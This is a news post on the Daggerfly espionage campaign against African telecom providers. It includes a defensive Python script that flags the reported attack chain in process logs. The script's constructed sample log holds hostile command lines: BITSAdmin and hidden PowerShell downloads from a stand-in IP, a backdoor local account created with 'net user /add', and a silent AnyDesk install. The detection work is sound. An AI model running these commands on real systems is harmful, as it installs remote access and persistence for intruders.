Sunday, May 26, 2024

The Daggerfly cyberattack campaign is now targeting African telecommunications service providers.

A China-linked threat actor has been targeting telecommunications service providers in Africa since November 2022. The group, tracked by Symantec as Daggerfly and also known as Bronze Highland and Evasive Panda, is using previously unseen plugins for the MgBot malware framework in this campaign. The attackers also use a PlugX loader and abuse the legitimate AnyDesk remote desktop software.

Daggerfly's use of MgBot is not new. Malwarebytes reported in July 2020 that the group had used MgBot in phishing attacks aimed at Indian government personnel and at individuals in Hong Kong.

The group uses spear-phishing as its initial access vector and deploys MgBot, Cobalt Strike, and KsRemote, a remote access trojan (RAT) for Android. According to Secureworks, the group has conducted espionage against domestic human-rights and pro-democracy advocates, as well as against neighbouring countries, since 2014.

The attack chain analyzed by Symantec relies on living-off-the-land (LotL) tools such as BITSAdmin and PowerShell to deliver next-stage payloads, including the AnyDesk executable and a credential-harvesting utility. The threat actor then creates a local account for persistence on the victim system and deploys the modular MgBot framework, whose plugins collect a broad range of sensitive information from the host.
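Every step in that chain leaves a process-creation record, so a detection does not need MgBot signatures to catch it early. The script below is an added example written for this article, not code from Symantec or the original post: it runs simple rules over constructed process-creation log lines (a simplified Sysmon Event ID 1 key=value layout, with made-up host names, user names and a documentation-range IP) and raises an alert only when a host shows a LotL download followed by either a local account creation or an AnyDesk launch. The rule names, thresholds and sample lines are assumptions for illustration.

```python
"""Correlate BITSAdmin/PowerShell downloads, 'net user /add' and AnyDesk launches.

Added example for the Daggerfly attack chain described above; not the
campaign's telemetry and not Symantec's code.
"""
import re
from collections import defaultdict

# Constructed sample log (simplified Sysmon Event ID 1 fields as key=value).
# Host names, users, paths and the 198.51.100.7 address are invented.
SAMPLE_LOG = r'''
Host=WS01 User=CORP\jdoe Image=C:\Windows\System32\bitsadmin.exe CommandLine="bitsadmin /transfer upd /download /priority high http://198.51.100.7/u.dat C:\Users\Public\u.exe"
Host=WS01 User=CORP\jdoe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/ad.exe','C:\Users\Public\AnyDesk.exe')"
Host=WS01 User=CORP\jdoe Image=C:\Windows\System32\net.exe CommandLine="net user support1 P@ssw0rd! /add"
Host=WS01 User=CORP\jdoe Image=C:\Users\Public\AnyDesk.exe CommandLine="C:\Users\Public\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"
Host=WS02 User=CORP\asmith Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -File C:\scripts\inventory.ps1"
Host=WS02 User=CORP\asmith Image=C:\Windows\System32\net.exe CommandLine="net use Z: \\fileserver\share"
'''

# key=value pairs; a value is either a double-quoted string or a run of non-spaces.
# Real Sysmon exports should be parsed from XML/JSON; this layout is a stand-in.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn one event line into a dict, stripping quotes from quoted values."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields


def image_name(event):
    """Lower-cased basename of the Image field (the executable that started)."""
    return event.get("Image", "").rsplit("\\", 1)[-1].lower()


def cmdline(event):
    return event.get("CommandLine", "")


# (rule name, predicate). Each rule maps to one stage of the reported chain.
RULES = [
    ("bitsadmin_download",
     lambda e: image_name(e) == "bitsadmin.exe"
     and re.search(r"/(transfer|download|addfile)\b", cmdline(e), re.I)),
    ("powershell_download",
     lambda e: image_name(e) in ("powershell.exe", "pwsh.exe")
     and re.search(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
                   cmdline(e), re.I)),
    ("local_account_created",
     lambda e: image_name(e) in ("net.exe", "net1.exe")
     and re.search(r"\buser\b.*\s/add\b", cmdline(e), re.I)),
    # Name-based only: a renamed AnyDesk binary needs a hash or signer match instead.
    ("anydesk_executed",
     lambda e: image_name(e) == "anydesk.exe"),
]

DOWNLOAD_STAGES = {"bitsadmin_download", "powershell_download"}
FOLLOW_ON_STAGES = {"local_account_created", "anydesk_executed"}


def analyze(log_text):
    """Tag each event, group tags per host, and flag hosts showing the full chain.

    Returns (tags_per_host, alerted_hosts). A host alerts only when it has at
    least one download-stage tag AND one follow-on-stage tag, which keeps a lone
    admin 'net user /add' or a lone PowerShell download below the threshold.
    """
    per_host = defaultdict(set)
    for line in log_text.strip().splitlines():
        event = parse_event(line)
        for name, predicate in RULES:
            if predicate(event):
                per_host[event.get("Host", "?")].add(name)
    alerts = sorted(host for host, tags in per_host.items()
                    if tags & DOWNLOAD_STAGES and tags & FOLLOW_ON_STAGES)
    return {host: sorted(tags) for host, tags in per_host.items()}, alerts


if __name__ == "__main__":
    tags, alerts = analyze(SAMPLE_LOG)
    for host, names in tags.items():
        print(host, names)
    print("ALERT:", alerts)
```

On the constructed log, WS01 collects all four tags and is the only host alerted; WS02's PowerShell script run and `net use` are ignored because neither matches a download or account-creation primitive. In production the same correlation should be keyed on a time window as well as on host, since the chain here completes within minutes.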

SentinelOne recently reported on a cyber-espionage campaign in Q1 2023, dubbed "Tainted Love," that targeted telecommunications providers in the Middle East and was attributed to a Chinese group. Symantec subsequently identified three more victims of the same activity cluster in Asia and Africa; two of them were subsidiaries of a Middle Eastern telecommunications company and were breached in November 2022. Symantec cautions that telecommunications companies are likely to remain prime targets of intelligence-gathering operations because of the access they offer to end users' communications.
